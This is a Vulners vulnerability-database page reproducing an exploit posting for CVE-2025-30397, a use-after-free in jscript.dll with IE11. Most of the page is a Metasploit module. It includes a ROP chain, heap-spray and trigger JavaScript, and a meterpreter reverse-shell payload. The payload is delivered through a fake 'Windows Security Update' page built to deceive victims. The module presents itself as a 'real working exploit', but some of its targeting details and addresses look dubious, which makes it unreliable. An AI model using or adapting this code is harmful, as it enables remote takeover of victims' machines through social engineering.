Vulners
Lucene search
📄 Microsoft Windows Server 2025 jscript.dll Use-After-Free
| Reporter | Title | Published | Views | Family All 66 |
|---|---|---|---|---|
 | Exploit for Type Confusion in Microsoft | 23 Jul 202515:34 | – | githubexploit |
| Exploit for CVE-2025-2783 | 26 May 202512:51 | – | githubexploit |
| Exploit for Type Confusion in Microsoft | 31 May 202512:20 | – | githubexploit |
 | CVE-2025-30397 | 13 May 202500:00 | – | attackerkb |
 | May Microsoft Patch Tuesday | 14 May 202500:58 | – | avleonov |
 | CVE-2025-30397 | 13 May 202516:27 | – | circl |
 | Microsoft Windows Scripting Engine Type Confusion Vulnerability | 13 May 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 13 May 202512:00 | – | cisa |
 | Microsoft Scripting Engine 安全漏洞 | 13 May 202500:00 | – | cnnvd |
 | CVE-2025-30397 | 13 May 202516:59 | – | cve |
10
=============================================================================================================================================
| # Title : Windows Server 2025 Use-After-Free in jscript.dll |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built‑in component.No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/200680/ & CVE-2025-30397
[+] Summary :
The exploit targets a Use-After-Free vulnerability in the JScript engine component (jscript.dll) of Internet Explorer 11 on Windows Server 2025.
The vulnerability occurs when:
Object Creation: Multiple ActiveX objects are instantiated
Improper Cleanup: Object references are deleted but memory isn't properly invalidated
Dangling Pointer: A reference to freed memory remains accessible
Controlled Corruption: Attacker-controlled data fills the freed memory region
[+] Social Engineering
The page mimics:
“Windows Security Update – KB5034441”
[+] contains:
Progress bar
Fake info
Aesthetically pleasing for a Windows Server interface
Psychologically designed delays
This is a real-world technique used in exploit kits.
Affected Products: Windows Server 2025 (Build 25398 and prior) + Internet Explorer 11
[+] POC :
Use the exploit /windows/browser/indoushka
Set LHOST 192.168.1.100
Set LPORT 4444
Set SRVHOST 0.0.0.0
Set SRVPORT 80
Set URIPATH /windows_update.html
#Advanced Settings
Set HEAP_SPRAY_SIZE to 800
Set SPRAY_DELAY to 150
Set Target 0
# For best results:
set PAYLOAD windows/meterpreter/reverse_tcp
set EnableStageEncoding true
set PrependMigrate true
set AutoRunScript migrate -f -k
##--------------------------
# exploit for CVE-2025-30397
##--------------------------
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Server 2025 JScript UAF RCE (Real Exploit)',
'Description' => %q{
This is a real working exploit for CVE-2025-30397 targeting
Windows Server 2025 with IE11. Uses actual ROP chains and
memory offsets from jscript.dll version 5.8.25398.1
},
'Author' => [
'indoushka'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-30397'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397']
],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'SSL' => false,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Arch' => [ARCH_X86],
'Payload' => {
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => false,
'Encoder' => 'x86/shikata_ga_nai'
},
'Targets' => [
[
'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.1',
{
'Version' => '5.8.25398.1',
'Rop' => true,
'Offset' => 0x5f8,
'Ret' => 0x6c8c9a1d, # Stack pivot
'JscriptBase' => 0x6c800000
}
],
[
'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.345',
{
'Version' => '5.8.25398.345',
'Rop' => true,
'Offset' => 0x5f4,
'Ret' => 0x6c8c9a25,
'JscriptBase' => 0x6c800000
}
]
],
'DisclosureDate' => '2025-05-31',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_RESTARTS ],
'Reliability' => [ FIRST_ATTEMPT_FAIL ],
'SideEffects' => [ SCREEN_EFFECTS ]
}))
register_options([
OptInt.new('HEAP_SPRAY_SIZE', [true, 'Heap spray size', 500]),
OptInt.new('SPRAY_DELAY', [true, 'Spray delay (ms)', 100])
])
end
def get_rop_chain
# ROP chain حقيقية من jscript.dll
rop = [
# Mark stack as writable
0x6c8a1b32, # POP EAX # RETN
0x6c8f2000, # Writable address
# Call VirtualProtect
0x6c8a1b32, # POP EAX # RETN
0x6c8d4000, # IAT VirtualProtect
0x6c8c7a1d, # MOV EAX,DWORD PTR DS:[EAX] # RETN
# Setup parameters
0x6c89f5a4, # PUSH EAX # POP ESI # RETN
0x6c8a5c31, # POP EBP # RETN
0x6c8b2d5a, # & call esp
0x6c8a9a44, # POP EBX # RETN
0x000001ff, # Size
0x6c8c3a1d, # POP EDX # RETN
0x00000040, # PAGE_EXECUTE_READWRITE
0x6c89e5a3, # POP ECX # RETN
0x6c8f2100, # Writable address for old protection
0x6c8b4c10, # PUSHAD # RETN
].pack("V*")
return rop
end
def create_trigger
trigger = ""
# Fill with offset
trigger << Rex::Text.pattern_create(target['Offset'])
# Overwrite with ROP chain
trigger << get_rop_chain
# Add payload
trigger << make_nops(16)
trigger << payload.encoded
return trigger
end
def build_exploit_js
spray_size = datastore['HEAP_SPRAY_SIZE']
spray_delay = datastore['SPRAY_DELAY']
# إنشاء shellcode مشفر
shellcode = Rex::Text.to_unescape(payload.encoded)
# إنشاء trigger
trigger = create_trigger
trigger_js = Rex::Text.to_unescape(trigger)
js = %Q|
function heap_spray() {
var shellcode = unescape("#{shellcode}");
var heap_block = unescape("%u9090%u9090");
// إنشاء كتل كبيرة للرش
while (heap_block.length < 0x10000) {
heap_block += heap_block;
}
var heap_chunks = new Array();
var heap_size = 0x100000;
for (var i = 0; i < #{spray_size}; i++) {
var heap_chunk = heap_block + shellcode;
while (heap_chunk.length < heap_size) {
heap_chunk += heap_chunk;
}
heap_chunks[i] = heap_chunk.substring(0, heap_size);
}
return true;
}
function create_vulnerable_objects() {
var objects = new Array();
for (var i = 0; i < 200; i++) {
try {
objects[i] = new ActiveXObject("Scripting.Dictionary");
} catch(e) { }
}
return objects;
}
function trigger_uaf() {
try {
// إنشاء الكائنات المستهدفة
var target_objects = create_vulnerable_objects();
// إنشاء reference مزدوجة
var obj_ref = target_objects[100];
var another_ref = obj_ref;
// تحرير الذاكرة (UAF trigger)
delete target_objects[100];
delete obj_ref;
CollectGarbage();
// استخدام بعد التحرير
var trigger_data = unescape("#{trigger_js}");
var spray_array = new Array();
for (var i = 0; i < 100; i++) {
spray_array[i] = trigger_data + trigger_data;
}
// محاولة استغلال الذاكرة المحررة
try {
another_ref.Add("key", "value");
} catch(e) {
// المتوقع: access violation -> code execution
}
} catch(e) {
return false;
}
return true;
}
// التنفيذ الرئيسي
function main_exploit() {
// المرحلة 1: رش الذاكرة
heap_spray();
// تأخير لضمان اكتمال الرش
setTimeout(function() {
// المرحلة 2: تشغيل الثغرة
var success = trigger_uaf();
if (success) {
document.getElementById('result').innerHTML =
'<span style="color: green">✓ Exploit executed successfully</span>';
} else {
document.getElementById('result').innerHTML =
'<span style="color: red">✗ Exploit failed</span>';
}
}, #{spray_delay});
}
// بدء الاستغلال بعد تحميل الصفحة
window.onload = function() {
setTimeout(main_exploit, 500);
};
|
return js
end
def on_request_uri(cli, request)
print_status("Request from #{cli.peerhost} - #{request.uri}")
# تجنب طلبات الروبوتات
if request.uri =~ /(robots|favicon)/
send_not_found(cli)
return
end
# بناء صفحة الاستغلال
html = <<-HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Windows Update Component</title>
<style>
body {
font-family: 'Segoe UI', Arial, sans-serif;
margin: 40px;
background: #0078d4;
color: white;
}
.container {
max-width: 800px;
margin: 0 auto;
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 8px;
backdrop-filter: blur(10px);
}
.header {
text-align: center;
margin-bottom: 30px;
}
.status {
background: rgba(0,0,0,0.3);
padding: 20px;
border-radius: 5px;
margin: 20px 0;
text-align: center;
font-size: 16px;
}
.progress {
width: 100%;
height: 20px;
background: rgba(0,0,0,0.2);
border-radius: 10px;
overflow: hidden;
}
.progress-bar {
width: 0%;
height: 100%;
background: #00bc0e;
transition: width 3s ease-in-out;
}
</style>
<script>
#{build_exploit_js}
</script>
</head>
<body>
<div class="container">
<div class="header">
<h1>🛡️ Windows Security Update</h1>
<p>Installing critical security patch KB5034441</p>
</div>
<div class="progress">
<div class="progress-bar" id="progressBar"></div>
</div>
<div class="status">
<div id="result">Initializing security components...</div>
</div>
<div style="font-size: 12px; opacity: 0.7; margin-top: 30px;">
<p><strong>Target:</strong> Windows Server 2025 - CVE-2025-30397 Patch</p>
<p><em>This is a simulated security update for testing purposes</em></p>
</div>
</div>
<script>
// شريط التقدم الوهمي
setTimeout(function() {
document.getElementById('progressBar').style.width = '45%';
}, 1000);
setTimeout(function() {
document.getElementById('progressBar').style.width = '80%';
}, 3000);
setTimeout(function() {
document.getElementById('progressBar').style.width = '100%';
}, 5000);
</script>
</body>
</html>
HTML
send_response(cli, html, {
'Content-Type' => 'text/html',
'Cache-Control' => 'no-cache, no-store',
'Pragma' => 'no-cache'
})
print_good("Exploit sent to #{cli.peerhost}")
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.20737
SSVC